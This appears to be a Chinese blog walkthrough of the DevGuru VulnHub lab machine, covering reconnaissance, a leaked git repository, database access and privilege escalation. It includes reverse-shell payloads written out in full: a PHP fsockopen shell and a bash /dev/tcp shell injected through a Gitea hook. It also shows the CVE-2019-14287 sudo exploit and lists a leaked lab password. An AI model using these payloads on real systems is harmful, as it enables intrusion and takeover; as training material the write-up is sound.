当前位置: 首页 > news >正文

vulnhub系列:devguru

vulnhub系列:devguru

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

nmap扫描网段

nmap扫描端口,开放端口:22、80、8585

nmap 192.168.23.147 -p- -sV -Pn -O

nmap扫描端口

访问80端口

首页

dirb目录扫描,存在 git 源码、

dirb http://192.168.23.147/

目录扫描结果

拼接发现数据库登录页面

mysql登录页面

发现登录页面

登录页面

拼接/.git/config,发现8585端口的路径

git下config

拼接,是8585端口的页面

发现8585端口登录页面

拼接/.git/description,提示通过编辑 description 库来命名数据库

git下description

找不到其他东西,扫一下 8585 端口的目录

搜索框

搜索框

也没扫出什么东西,看一下80端口的 git 源码泄露,Githack 下载查看

githack下载源码

源码中发现 mysql 账号密码

mysql账号密码

成功登录数据库

登录数据库

发现 frank 用户,但是密码破解不出来,直接添加一个用户

发现frank用户

添加jqj用户

设置权限

设置组

添加用户后无法登录,john 解码发现密码为 bcrypt 加密发现密码,设置密码时需要选择 encrypt ,修改后成功登录

登录80后台

二、getshell

在 cms -> pages 可以写入语句,这里我在 about 中写入语句

function onStart(){$s=fsockopen("192.168.195.130",7777);$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);
}

写入反弹shell语句

kali监听4444端口,然后访问页面的about路径

访问about

成功反弹shell

成功反弹shell

三、提权

使用python提升交互性

python3 -c "import pty;pty.spawn('/bin/bash')"

image-20240813190145545

尝试提权失败,/home 目录下有一个 frank 目录,也没有权限进入

/var/backups 下发现 app.ini.pak,查看内容

image-20240813190806441

得到 gitea 账号密码

gitea:UfFPTF8C8jjxVF2m

返回 adminer.php 页面,登录

image-20240813191013424

user 表下发现 frank 用户,密码 bcrypt 加密

image-20240813191202176

将密码修改为同样 bcrypt 加密的,123456

https://www.bejson.com/encrypt/bcrpyt_encode/$2a$10$vVQiseY5ZaYAwCcbgXJRpOxOhqXtXfN2SvsjW3vG3AXWw3R.LESIe

image-20240813191718376

将密码修改

image-20240813192023609

访问 8585端口的 /user/login 进行登录

image-20240813192127390

image-20240813192138443

登录后点击

image-20240813192527638

image-20240813192610069

在其中写入反弹 shell 语句

bash -c "exec bash -i >& /dev/tcp/192.168.23.133/4444 0>&1"

image-20240813192824608

下方点击保存

image-20240813192841923

kali 开启监听

nc -lvnp 4444

image-20240813193055175

返回前几个路径,随便修改一个文件,保存后即可反弹shell

image-20240813193131293

在 /home/frank 下发现第一个 flag 文件

image-20240813193336959

查看当前权限

sudo -l

image-20240813193235528

发现 sqlite3 命令能执行 root 权限,执行命令

sudo sqlite3 /dev/null '.shell /bin/sh'

提权失败,百度搜了一下,是由于 sudo 版本问题导致,查看 sudo 版本

sudo -V

image-20240813193827644

又查了一下,sudo 版本低于 1.8.27,存在 CVE-2019-14287 漏洞,执行命令,提权成功

sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'

image-20240813194035788

在 /root 下发现第二个 flag

image-20240813194120521

http://www.lryc.cn/news/423452.html

相关文章:

  • Robot Operating System——高质量图像传输
  • NLP_情感分类_预训练加微调方案
  • 全网最适合入门的面向对象编程教程:36 Python的内置数据类型-字典
  • DataWind看板绘制案例
  • Golang | Leetcode Golang题解之第335题路径交叉
  • C# 在Word中插入或删除分节符
  • 基于STM32+Qt设计的无人超市收银系统(206)
  • 开源免费的表单收集系统TDuck
  • Python 生成器、迭代器、可迭代对象 以及应用场景
  • 马斯克对欧盟的反应
  • uniapp + 安卓APP + H5 + 微信小程序实现PDF文件的预览和下载
  • Elasticsearch 8 RAG 技术分享
  • 根据字典值回显,有颜色的
  • 多台PC网络ADB连接同一台RK3399 Android7.1.2设备
  • 前端黑科技:使用 JavaScript 实现网页扫码功能
  • 【人工智能】全景解析:【机器学习】【深度学习】从基础理论到应用前景的【深度探索】
  • MySQL与PostgreSQL语法区别
  • vue2+OpenLayers 天地图上凸显出当前地理位置区域(4)
  • 基于Python、Django开发Web计算器
  • 高性能并行计算面试-核心概念-问题理解
  • java-activiti笔记
  • Layui——隐藏表单项后不再进行验证
  • Github Copilot 使用技巧
  • 【实现100个unity特效之20】用unity实现物品悬浮和发光像素粒子特效
  • GPT-4o mini发布,轻量级大模型如何颠覆AI的未来?
  • 高性能的 C++ Web 开发框架 CPPCMS + WebSocket 模拟实现聊天与文件传输案例。
  • 合合信息OCR支持30类国内常见票据一站式分类识别,支持医疗发票、数电票识别
  • LeetCode-day40-3151. 特殊数组 I
  • 技术研究:Redis 数据结构与 I/O 模型
  • 46-扇孔的处理及铺铜以及布线